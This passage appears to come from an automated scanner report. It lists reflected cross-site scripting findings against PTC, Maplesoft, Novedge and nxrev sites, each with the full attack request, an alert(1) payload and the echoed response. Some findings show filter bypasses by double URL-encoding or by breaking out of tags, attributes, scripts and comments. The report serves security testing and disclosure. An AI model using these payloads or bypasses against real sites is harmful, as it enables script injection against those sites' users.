Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:26 GMT

<strong>/sharedvue/dyn/ticka342f%3cscript%3ealert%281%29%3c%2fscript%3e8dc35401c8a/370965936.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/ticka342f<script>alert(1)</script>8dc35401c8a/370965936.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.14. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965951.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965951.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c4240%253cscript%253ealert%25281%2529%253c%252fscript%253ebd830fac3e6 was submitted in the REST URL parameter 4. This input was echoed as c4240<script>alert(1)</script>bd830fac3e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tickc4240%253cscript%253ealert%25281%2529%253c%252fscript%253ebd830fac3e6/370965951.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:28 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:29 GMT

<strong>/sharedvue/dyn/tickc4240%3cscript%3ealert%281%29%3c%2fscript%3ebd830fac3e6/370965951.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickc4240<script>alert(1)</script>bd830fac3e6/370965951.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.15. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965966.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965966.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63cf8%253cscript%253ealert%25281%2529%253c%252fscript%253e3d0d1c1d791 was submitted in the REST URL parameter 4. This input was echoed as 63cf8<script>alert(1)</script>3d0d1c1d791 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tick63cf8%253cscript%253ealert%25281%2529%253c%252fscript%253e3d0d1c1d791/370965966.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:43 GMT

<strong>/sharedvue/dyn/tick63cf8%3cscript%3ealert%281%29%3c%2fscript%3e3d0d1c1d791/370965966.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tick63cf8<script>alert(1)</script>3d0d1c1d791/370965966.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.16. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965981.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965981.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e166%253cscript%253ealert%25281%2529%253c%252fscript%253ef8a4a5e1112 was submitted in the REST URL parameter 4. This input was echoed as 7e166<script>alert(1)</script>f8a4a5e1112 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tick7e166%253cscript%253ealert%25281%2529%253c%252fscript%253ef8a4a5e1112/370965981.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:58 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:58 GMT

<strong>/sharedvue/dyn/tick7e166%3cscript%3ealert%281%29%3c%2fscript%3ef8a4a5e1112/370965981.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tick7e166<script>alert(1)</script>f8a4a5e1112/370965981.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.17. http://search.maplesoft.com/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.maplesoft.com
Path:	/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ecf21<script>alert(1)</script>94c0bacfe0a was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=xss%20txt%20css%20img%20help%20faqecf21<script>alert(1)</script>94c0bacfe0a HTTP/1.1
Host: search.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/contact/webforms/requestquote.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1034538322-1317672438708; mbox=check#true#1317672536|session#1317672433761-966952#1317674336|PC#1317672433761-966952.19#1320264476; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Connection: Close
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Mon, 03 Oct 2011 20:08:16 GMT
Content-Length: 42520

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<title>Maplesoft Site Search Results: xss txt css img help faqecf21<script>alert(1)</script>94c0bacfe0a</titl
...[SNIP]...
<font color="#ffffff">xss txt css img help faqecf21<script>alert(1)</script>94c0bacfe0a</font>
...[SNIP]...

1.18. http://search.maplesoft.com/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.maplesoft.com
Path:	/search

Issue detail

The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload bb81b</title><script>alert(1)</script>996cd7acc25 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=xss%20txt%20css%20img%20help%20faqbb81b</title><script>alert(1)</script>996cd7acc25 HTTP/1.1
Host: search.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/contact/webforms/requestquote.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1034538322-1317672438708; mbox=check#true#1317672536|session#1317672433761-966952#1317674336|PC#1317672433761-966952.19#1320264476; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Connection: Close
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Mon, 03 Oct 2011 20:08:19 GMT
Content-Length: 42574

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<title>Maplesoft Site Search Results: xss txt css img help faqbb81b</title><script>alert(1)</script>996cd7acc25</title>
...[SNIP]...

1.19. http://search.maplesoft.com/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.maplesoft.com
Path:	/search

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91147"><script>alert(1)</script>75923144cb3 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=xss%20txt%20css%20img%20help%20faq91147"><script>alert(1)</script>75923144cb3 HTTP/1.1
Host: search.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/contact/webforms/requestquote.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1034538322-1317672438708; mbox=check#true#1317672536|session#1317672433761-966952#1317674336|PC#1317672433761-966952.19#1320264476; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Connection: Close
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Mon, 03 Oct 2011 20:08:14 GMT
Content-Length: 42536

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<title>Maplesoft Site Search Results: xss txt css img help faq91147"><script>alert(1)</script>75923144cb3</ti
...[SNIP]...
<input type="text" name="q"
size="32" maxlength="256" value="xss txt css img help faq91147"><script>alert(1)</script>75923144cb3">
...[SNIP]...

1.20. http://www.maplesoft.com/products/maple/new_features/index.aspx [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maplesoft.com
Path:	/products/maple/new_features/index.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a7b"%3balert(1)//97e7ce188ef was submitted in the p parameter. This input was echoed as 92a7b";alert(1)//97e7ce188ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products/maple/new_features/index.aspx?p=TC-194592a7b"%3balert(1)//97e7ce188ef HTTP/1.1
Host: www.maplesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=4ihl4e55nrxjtk45j4qxvoum; .Country=US; s_cc=true; mbox=check#true#1317672494|session#1317672433761-966952#1317674294|PC#1317672433761-966952.19#1320264438; __qca=P0-1034538322-1317672438708; s_sq=maplesoftcom%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.maplesoft.com%25252Fproducts%25252Fmaple%25252Fnew_features%25252Findex.aspx%25253Fp%25253DTC-1945%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MTC=TC-194592a7b";alert(1)//97e7ce188ef; domain=.maplesoft.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:07:58 GMT
Content-Length: 94772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>New Features in Maple 15 ... Technical Computing Software for Engineers, Mathematicians, Scientists, Teachers
...[SNIP]...
nel on the next lines. */
s.pageName="Maple:New:Home"
s.server="North America"
s.channel="Maple:New"
s.pageType=""
s.prop3="english"
s.prop13="Non-Member"
/* Conversion Variables */
s.campaign="TC-194592a7b";alert(1)//97e7ce188ef"
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.currencyCode=""
s.eVar13="Non-Member"
s.eVar18="Maple"
s.hier1="Products|Maple 15"
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANY
...[SNIP]...

1.21. http://www.novedge.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.novedge.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86ddf'><script>alert(1)</script>c860ba290c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?86ddf'><script>alert(1)</script>c860ba290c6=1 HTTP/1.1
Host: www.novedge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 20:01:42 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=100" >
<base href='http://www.nove
...[SNIP]...
<a class='MediumLink' style='font:normal 0.9em tahoma;color:#000;' href='/default.asp?86ddf'><script>alert(1)</script>c860ba290c6=1'>
...[SNIP]...

1.22. http://www.novedge.com/products/5082 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.novedge.com
Path:	/products/5082

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bc5b'%20a%3db%20c47aa2464be was submitted in the REST URL parameter 2. This input was echoed as 9bc5b' a=b c47aa2464be in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/50829bc5b'%20a%3db%20c47aa2464be HTTP/1.1
Host: www.novedge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.novedge.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDARCDA=AOOIJDPAJNLFLMGJEGBOGCOJ; __utma=104052895.1586457492.1317672101.1317672101.1317672101.1; __utmb=104052895; __utmc=104052895; __utmz=104052895.1317672101.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 20:05:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=100" >
<base href='http://www.nove
...[SNIP]...
<a class='MediumLink' style='font:normal 0.9em tahoma;color:#000;' href='page_bookmark.asp?SKU=50829bc5b' a=b c47aa2464be'>
...[SNIP]...

1.23. http://www.novedge.com/products/5082 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.novedge.com
Path:	/products/5082

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d42d7'><script>alert(1)</script>9eb5bd3fac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/5082?d42d7'><script>alert(1)</script>9eb5bd3fac6=1 HTTP/1.1
Host: www.novedge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.novedge.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDARCDA=AOOIJDPAJNLFLMGJEGBOGCOJ; __utma=104052895.1586457492.1317672101.1317672101.1317672101.1; __utmb=104052895; __utmc=104052895; __utmz=104052895.1317672101.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 20:05:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=100" >
<base href='http://www.nove
...[SNIP]...
<a class='MediumLink' style='font:normal 0.9em tahoma;color:#000;' href='page_bookmark.asp?d42d7'><script>alert(1)</script>9eb5bd3fac6=1&SKU=5082'>
...[SNIP]...

1.24. http://www.nxrev.com/content-0 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nxrev.com
Path:	/content-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41cf9"><script>alert(1)</script>c6bea8865ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41cf9\"><script>alert(1)</script>c6bea8865ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content-0?41cf9"><script>alert(1)</script>c6bea8865ab=1 HTTP/1.1
Host: www.nxrev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nxrev.com/software/creo-elementspro
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS27194b44324db43e775ea265cf2ee23f=c70b3de1d6c64f34ced9ae5dcc424fd5

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:04:46 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 03 Oct 2011 20:04:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
<a href="http://www.nxrev.com/content-0?q=node/179&41cf9\"><script>alert(1)</script>c6bea8865ab=1&svpage=overview">
...[SNIP]...

1.25. http://www.nxrev.com/content-0 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nxrev.com
Path:	/content-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52341</script><script>alert(1)</script>b8791619bc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content-0?52341</script><script>alert(1)</script>b8791619bc7=1 HTTP/1.1
Host: www.nxrev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nxrev.com/software/creo-elementspro
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS27194b44324db43e775ea265cf2ee23f=c70b3de1d6c64f34ced9ae5dcc424fd5

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:41 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 03 Oct 2011 20:05:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
ntactID = '';
var strSVPageShortcut = 'overview';
var strSVPageRenderViewID = '454428';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.nxrev.com/content-0?q=node/179&52341</script><script>alert(1)</script>b8791619bc7=1');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.26. http://www.ptc.com/appserver/auth/authenticate.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/appserver/auth/authenticate.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload efdc8--><script>alert(1)</script>b736844fc35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /appserverefdc8--><script>alert(1)</script>b736844fc35/auth/authenticate.jsp?dest=http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:06:13 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=2A388610E8DC61DF60BAB9D35586AA44.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43374
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:38 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<script>alert(1)</script>b736844fc35/auth/authenticate.jsp-->
...[SNIP]...

1.27. http://www.ptc.com/appserver/search/results.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptc.com
Path:	/appserver/search/results.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389fc"><script>alert(1)</script>c47fd1f535d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver389fc"><script>alert(1)</script>c47fd1f535d/search/results.jsp?q=xss+txt+css+img+help+faq HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:06:01 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
